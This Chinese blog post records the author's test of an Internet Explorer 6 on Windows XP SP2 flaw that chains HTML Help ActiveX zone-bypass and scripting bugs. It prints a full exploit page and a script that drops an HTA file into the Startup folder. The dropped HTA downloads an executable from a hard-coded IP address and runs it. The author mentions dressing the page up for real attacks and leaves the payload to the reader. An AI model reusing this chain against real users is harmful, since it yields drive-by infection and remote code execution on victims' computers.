• 当前位置:首页>>编程开发A>>安全防御>>Internet Explorer XP SP2 Remote Compromise漏洞测试手记
  • Internet Explorer XP SP2 Remote Compromise漏洞测试手记
  • 几天前看了Microsoft Internet Explorer XP SP2 的一个漏洞,感觉挺有意思,于是就想测试一下。
    漏洞资料大家可以在:http://www.securiteam.com/windowsntfocus/6B00O2KC0C.html  看一下。虽然是E文,但是也不太难懂。
    这个漏洞利用了SP2众人皆知的Help ActiveX Control Related Topics Zone Security Bypass Vulnerability 和Help ActiveX Control

    Related Topics Cross Site Scripting Vulnerability这几个漏洞(用中文我不能正确描述,只好采用原文了)。

    影响系统:

    * Microsoft Internet Explorer 6.0
    * Microsoft Windows XP Pro SP2
    * Microsoft Windows XP Home SP2

    简单了解这些,我们可以开始测试了,首先新建一个testsp2.htm,内容如下:

    <HTML>
    <OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
    style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:Just a button">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">


    <OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
    style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:Just a button">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value='command;j avascript:execScript("document.write(\"<script language=\\\"v bscript\\\"

    src=\\\"http://blog.eviloctal.com/superlone/test/writehta.txt\\\"\" +

    String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
    </OBJECT>

    <script>
    localpage.HHClick();
    setTimeout("inject.HHClick()",100);
    </script>
    </HTML>


    说明:
    file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm这个就是XP sp2中代的帮助文档,为什么要选择这个文件呢?because it is

    treated as the local zone and it doesn't have any script to mess us up.

    其它的大家视情况来修改,咱们是测试因此就没必要弄那么华丽的页面了,如果要实战的话,恐怕得花点功夫好好打扮一下。上面关键语句是


    src=\\\"http://blog.eviloctal.com/superlone/test/writehta.txt\\\"\",这是另一个文件的URL,大家测试的时候要改成自己的。

    writehta.txt的内容如下:

    Dim Conn, rs
    Set Conn = CreateObject("ADODB.Connection")
    Conn.Open "Driver={ Microsoft Text Driver (*.txt; *.csv) };" & _
    "Dbq=ftp://xxxxx:xxxxx@218.4.xxx.xxx/test/;" & _
    "Extensions=asc,csv,tab,txt;" & _
    "Persist Security Info=False"
    set rs =CreateObject("ADODB.recordset")
    rs.Open "SELECT * from f00bar.txt", conn
    rs.Save "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Microsoft Office.hta", adPersistXML
    rs.close
    conn.close
    window.close

    大家看到这个与原文有点不一样,的确"Dbq=ftp://xxxxx:xxxxx@218.4.xxx.xxx/test/;"原文是"Dbq=http://www.malware.com;",但是我一开

    始也是按照这种格式来的,可是老是提示"Internet 无法登录",抓包一开,原来登录的是21端口,而且默认是用匿名用户和密码访问的。我的

    ftp不支持匿名用户访问,因此我就换了上面格式的地址。如果你去申请了一个免费的空间而且空间支持ftp的话你也应该换成下面的格式:

    ftp://用户名:密码@地址

    这个文件执行后会把f00bar.txt的内容写入到启动目录里的Microsoft Office.hta文件,而foobar.txt的内容如下:

    "< script language=v bscript> crap = """
    """: on error resume next: crap = """
    """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
    """ : o.open ""GET"",""http://222.174.144.130/tools/test/test.exe"",False : crap="""
    """ : o.send : crap="""
    """ : set s = createobject(""adodb.stream"") : crap="""
    """ : s.type=1 : crap="""
    """ : s.open : crap="""
    """ : s.write o.responseBody : crap="""
    """ : s.savetofile ""C:\test.exe"",2 : crap="""
    """ : Set ws = CreateObject(""WScript.Shell"") : crap="""
    """ : ws.Run ""C:\test.exe"", 3, FALSE : crap="""
    """</script> crap="""

    写入后下次启动就会自动去http://222.174.144.130/tools/test/test.exe下载test.exe文件,并保存到c盘根目录,然后运行它。之于这个文

    件是什么,你自由发挥吧。

    下面是我的测试,我是在winxp pro sp2上测试的,测试结果如下图:
    点击查看全图

    会出现一个我们提前设置的一个按钮,同是会弹出一个帮助文档,过一会去启动目录里看看,如下图:
    点击查看全图

    果然已经有了一个文档了。

    这是我的测试结果,感觉这个漏洞作网页木马还是困难点,不过它的思路还是很不错的,尤其是writehta.txt这部分,我们可以把她扩展到其

    它方面,这个还是留个大家去吧。

    OK!测试完成了!
  • 上一篇:Windows XP SP2激活精彩问答
    下一篇:Internet Explorer FTP Client Directory Traversal利用工具